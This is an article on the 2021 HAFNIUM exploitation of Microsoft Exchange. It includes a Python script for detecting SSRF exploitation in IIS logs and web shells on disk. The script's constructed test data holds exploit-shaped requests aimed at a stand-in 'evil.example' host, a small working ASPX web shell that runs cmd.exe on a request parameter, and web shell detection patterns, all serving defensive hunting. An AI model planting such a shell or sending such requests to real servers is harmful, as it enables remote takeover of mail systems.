A group of attackers exploited zero-day vulnerabilities in Microsoft Exchange Server to steal data from organizations around the world. Microsoft shipped out-of-band patches on March 2, 2021, but exploitation had been under way since at least early January 2021, and many organizations remained unpatched for weeks after the fixes were available. The incident underlines two points: keeping Internet-facing software current matters, and regular penetration testing and log review are needed to find both unpatched servers and intrusions that have already happened.
Note that the identifier often quoted in this context, CVE-2022-41040, belongs to a later and separate Exchange flaw known as ProxyNotShell (disclosed September 2022, patched November 8, 2022): an authenticated Server-Side Request Forgery (SSRF) that lets an attacker with valid credentials route requests through the front end to the Exchange PowerShell remoting endpoint, where it was chained with CVE-2022-41082 to achieve remote code execution (RCE). The HAFNIUM campaign used the earlier ProxyLogon chain, whose entry point, CVE-2021-26855, is an unauthenticated SSRF: an attacker who can reach the server over HTTPS can impersonate the Exchange server to its own backend with no credentials at all, then chain post-authentication bugs fixed in the same release to write arbitrary files on disk. In both cases the shape of the attack is the same: an SSRF through the Exchange front end reaches a privileged backend, and the attacker uses that access to drop web shells, malicious ASPX scripts placed under the OWA, ECP or aspnet_client directories that give persistent remote command execution over ordinary HTTPS. The web shells were then used for reconnaissance, mailbox and credential exfiltration, and lateral movement into the rest of the network.
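The two detection checks a practitioner would run against this pattern, looking for SSRF requests that reached the PowerShell backend in IIS logs and hunting for dropped web shells on disk, as an added example that is not code from the original article or from Microsoft. It assumes the default W3C IIS log format with a `#Fields:` header; the log lines and the `.aspx` files it creates are constructed test data, and the web shell markers are a heuristic to tune, not a signature.

```python
"""Hunt for SSRF-to-PowerShell exploitation attempts in IIS logs and for
ASP.NET web shells under an Exchange web root.

Added example with constructed sample data; not from the article or from
Microsoft. Assumes W3C IIS logs (the Exchange default) with a #Fields header.
"""
import re
import tempfile
from pathlib import Path

# Shape of a request that abuses the Autodiscover front end to reach the
# PowerShell backend: autodiscover.json carrying an "@" and a "powershell"
# segment. Status 200 means the request got through, not just that it was tried.
EXPLOIT_PATTERN = re.compile(
    r"autodiscover/autodiscover\.json.*@.*powershell", re.IGNORECASE
)

# Heuristic markers for ASP.NET web shells (assumed for this example):
# reading a request parameter, spawning a process, invoking cmd.exe, eval().
WEBSHELL_MARKERS = (
    re.compile(r"Request\.(Item|Form|QueryString)\[", re.IGNORECASE),
    re.compile(r"Process\.Start|ProcessStartInfo", re.IGNORECASE),
    re.compile(r"cmd\.exe|/c\s", re.IGNORECASE),
    re.compile(r"\beval\(", re.IGNORECASE),
)

# Constructed IIS log: a benign OWA hit, a successful exploit request, and
# a second attempt the server rejected with 401.
SAMPLE_IIS_LOG = r"""#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2022-09-30 01:02:03 10.0.0.5 GET /owa/ - 443 - 198.51.100.20 Mozilla/5.0 - 200 0 0 12
2022-09-30 01:02:09 10.0.0.5 POST /autodiscover/autodiscover.json @evil.example/powershell?X-Rps-CAT=xxxx 443 contoso\jdoe 203.0.113.7 python-requests/2.28 - 200 0 0 540
2022-09-30 01:02:15 10.0.0.5 POST /autodiscover/autodiscover.json @evil.example/powershell?X-Rps-CAT=yyyy 443 - 203.0.113.9 python-requests/2.28 - 401 0 0 3
"""


def parse_iis_log(text):
    """Yield one dict per request, naming columns from the #Fields directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or not line.strip():
            continue
        values = line.split()
        if fields is None or len(values) != len(fields):
            continue  # malformed or pre-header line; skip rather than guess
        yield dict(zip(fields, values))


def find_exploit_attempts(text):
    """Return (attempts, successes): all requests shaped like the SSRF chain,
    and the subset answered 200, which is what warrants incident response."""
    attempts, successes = [], []
    for rec in parse_iis_log(text):
        target = rec["cs-uri-stem"] + "?" + rec["cs-uri-query"]
        if EXPLOIT_PATTERN.search(target):
            attempts.append(rec)
            if rec["sc-status"] == "200":
                successes.append(rec)
    return attempts, successes


def scan_for_webshells(root, extensions=(".aspx", ".ashx", ".asmx")):
    """Walk a web root and flag script files matching at least two markers."""
    flagged = []
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in extensions:
            continue
        body = path.read_text(errors="ignore")
        score = sum(1 for marker in WEBSHELL_MARKERS if marker.search(body))
        if score >= 2:
            flagged.append(str(path))
    return flagged


def build_sample_webroot():
    """Create a throwaway web root with one benign page and one web shell
    (constructed content), returning its path."""
    root = Path(tempfile.mkdtemp(prefix="exch_www_"))
    (root / "owa" / "auth").mkdir(parents=True)
    (root / "owa" / "auth" / "logon.aspx").write_text(
        '<%@ Page Language="C#" %><html><body>Outlook Web App</body></html>'
    )
    (root / "aspnet_client" / "system_web").mkdir(parents=True)
    (root / "aspnet_client" / "system_web" / "abc.aspx").write_text(
        '<%@ Page Language="C#" %><% var c = Request.Item["cmd"]; '
        'System.Diagnostics.Process.Start("cmd.exe", "/c " + c); %>'
    )
    return root


if __name__ == "__main__":
    attempts, successes = find_exploit_attempts(SAMPLE_IIS_LOG)
    print(f"{len(attempts)} exploit-shaped requests, {len(successes)} succeeded")
    for rec in successes:
        print("  successful request from", rec["c-ip"], "as", rec["cs-username"])
    for shell in scan_for_webshells(build_sample_webroot()):
        print("possible web shell:", shell)
```

Run it against real data by pointing `find_exploit_attempts` at the concatenated IIS logs (typically under `C:\inetpub\logs\LogFiles`) and `scan_for_webshells` at the Exchange `FrontEnd\HttpProxy` directory and `aspnet_client`; a 200 hit or a flagged file means the server should be treated as compromised, not merely unpatched.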
Microsoft attributed the campaign to a group it named HAFNIUM, which it assessed to be state-sponsored and operating out of China. The group targeted a wide range of sectors, including law firms, NGOs, defense contractors, universities, infectious disease researchers, and local governments. Press reporting at the time put the number of compromised organizations at more than 30,000 in the US alone and potentially hundreds of thousands globally, and the incident is widely regarded as one of the largest mass-exploitation events of a single product on record.
Microsoft released patches for the vulnerabilities out of band on March 2, 2021, and urged customers to apply them immediately. Many organizations were slow to update, whether through lack of awareness, resources, or Exchange expertise, and a proof of concept was public within days, so other threat actors who had reverse-engineered the fixes began exploiting the same servers. Applying the patch closes the entry point but does not remove web shells, scheduled tasks, or accounts an intruder has already created, which is why patched servers still had to be inspected and, where a shell was found, treated as compromised. Some of the later attackers were reported to remove or disable the web shells left by HAFNIUM, either to cover their own tracks or to lock competing groups out of the servers they had taken over.
The attack raised serious concerns about the security of on-premises Microsoft Exchange Server, which is widely used for email and calendaring and is usually exposed directly to the Internet. Exchange has had a run of remotely exploitable flaws in recent years, such as CVE-2020-0688 (RCE through a fixed ViewState cryptographic key in the Exchange Control Panel) and CVE-2020-17144, both of which gave an authenticated attacker code execution on the server. Some experts have suggested that organizations consider migrating to hosted email such as Microsoft 365 or Google Workspace, which moves patching of the mail servers to the provider; the caveat is that hybrid deployments still keep an on-premises Exchange server that must be patched and monitored like any other.